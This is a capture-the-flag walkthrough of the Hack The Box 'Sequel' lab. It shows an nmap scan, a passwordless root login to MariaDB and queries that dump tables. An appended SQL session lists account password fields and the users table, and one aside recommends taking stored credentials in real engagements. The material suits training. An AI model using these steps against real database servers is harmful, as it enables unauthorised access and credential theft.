Mahbuba Shahrin
5 min read · Jan 4, 2022


HTB: Learn the basics of Pen Testing: Sequel

Enumeration

Target machine: 10.129.95.232

First, click the green “Spawn the Machine” button; make sure no other machine is active. The target IP address in this walkthrough is 10.129.95.232. Your target IP address may be different, so use the address you received for this box.

Then start with nmap -sV -sC 10.129.95.232 (-sV probes service versions, -sC runs the default scripts). The scan took a couple of minutes before it returned any information.

Open the IP address in a web browser to see whether a website is being served.

Nothing loads, because there is no website: the scan found a MySQL service on port 3306 and no web server. I typed ping 8.8.8.8 to make sure there was internet access, and there was, and pinged the target machine, which also answered, so the problem is not connectivity. Hence, for this machine, we will not be using a website.

Task 1 asks, “What does the acronym SQL stand for?”

The answer is Structured Query Language. You can Google the acronym to find the answer, or use the hint, which also advises a Google search.

Task 2 asks, “During our scan, which port running MySQL do we find?”

3306, the default MySQL port. It appears in the nmap output above.

Task 3 asks, “What community-developed MySQL version is the target running?”

Look back at the nmap scan: the service version string names MariaDB, the community-developed fork of MySQL.

Task 4 asked, “What switch do we need to use in order to specify a login username for the MySQL service?”

-u is the switch that specifies the login username, for example -u root, when connecting to the target machine with the mysql client.

Task 5 asks, “Which username allows us to log into MariaDB without providing a password?

Every account should have a password, but on this box the root account has been left with an empty one, and it is allowed to connect from remote hosts. We are after the root flag anyway, so my guess was root, which is the correct answer. Rather than guessing, you can confirm it after logging in by listing the accounts in the mysql.user table and checking which have an empty password column.

Task 6 asks, “What symbol can we use to specify within the query that we want to display everything inside a table?

I first guessed the semicolon (;), but that is not the case. The hint says, “This will make you starry-eyed,” which points at the asterisk (*). Trying again with the asterisk worked: in a SELECT query, * stands for every column, so SELECT * returns everything inside a table.

Task 7 asks, “What symbol do we need to end each query with?”

This is where the semicolon (;) comes in: every SQL statement is terminated with one. It worked like a charm.

Finally, “Submit root flag.”

I Googled “mariadb mysql login as root without password” and found a page on ibug.io describing three ways to use the MySQL/MariaDB CLI without a password.

In that ibug.io article, Method 3 (Unix authentication) gives the example mysql -h 127.0.0.1.

I still needed more help, so I searched again and found a serverfault.com answer with exactly the information I was looking for.

Combining the two gives the command that logs into the target as root (the -h switch sets the host, -u the username, and no password is supplied):

mysql -h 10.129.95.232 -u root

One caveat: a recent MariaDB client (11.x) requires TLS by default and refuses this server, which offers none, with a TLS/SSL error; in that case add --skip-ssl to the command.

The same serverfault.com answer also showed how to list databases and tables.

Therefore, I followed the same method to show databases.

The listing included a database called htb, so I typed: use htb;

After switching to the htb database, I typed: show tables;

The tables were users and config. Since we are already logged in as root, I skipped the users table at first (in a real engagement you should still dump it, because stored credentials are often reused elsewhere). I typed from config; which did not work, because a query needs a SELECT clause with a column list before the FROM clause. I remembered that Task 6 said the asterisk (*) selects everything inside a table, but I did not know how to use it, so I searched Google again

and came upon a page on actian.com.

It showed the query select * from personnel;

Replacing personnel with config gives select * from config; (SQL keywords are case-insensitive, so SELECT works just as well as select).

At last, the flag was there. The Sequel box is pwned.
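As an added example, not part of the original post, here is the whole session typed at the MariaDB prompt after connecting with mysql -h 10.129.95.232 -u root (add --skip-ssl on a MariaDB 11.x client). It covers the steps above in order and adds the checks I would actually run first: confirming the version seen by nmap (Task 3), verifying rather than guessing that root has an empty password (Task 5), and inspecting column names before dumping rows. The final filtered query assumes the config table has name and value columns; adjust it to what DESCRIBE reports.

```sql
-- Added example session for the Sequel box (not the original post's code).
-- Connect first from the attacker shell:
--   mysql -h 10.129.95.232 -u root        (append --skip-ssl on MariaDB 11.x clients)
-- Everything below is entered at the MariaDB [(none)]> prompt.

-- Confirm the version string nmap reported (Task 3) from inside the server.
SELECT @@version;

-- Task 5, verified instead of guessed: list every account with its host
-- pattern and password. An empty password column together with host '%'
-- is what lets root log in from anywhere without credentials.
SELECT user, host, password, plugin FROM mysql.user;

-- What the account we hold is allowed to do.
SHOW GRANTS FOR CURRENT_USER();

-- Enumerate schemas, then switch to the non-default one.
SHOW DATABASES;
USE htb;

-- List tables, and inspect the columns of each before dumping rows.
SHOW TABLES;
DESCRIBE config;
DESCRIBE users;

-- Tasks 6 and 7: '*' selects every column, ';' terminates the statement.
SELECT * FROM config;
SELECT * FROM users;   -- worth dumping too: stored credentials are often reused

-- Once column names are known, pull the flag row directly instead of the
-- whole table. Assumption: config has 'name' and 'value' columns.
SELECT value FROM config WHERE name LIKE '%flag%';
```

The mysql.user query is the check that turns Task 5 from a guess into evidence: it shows both that the root password is empty and which hosts the account accepts connections from, which is the misconfiguration this box is built around.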
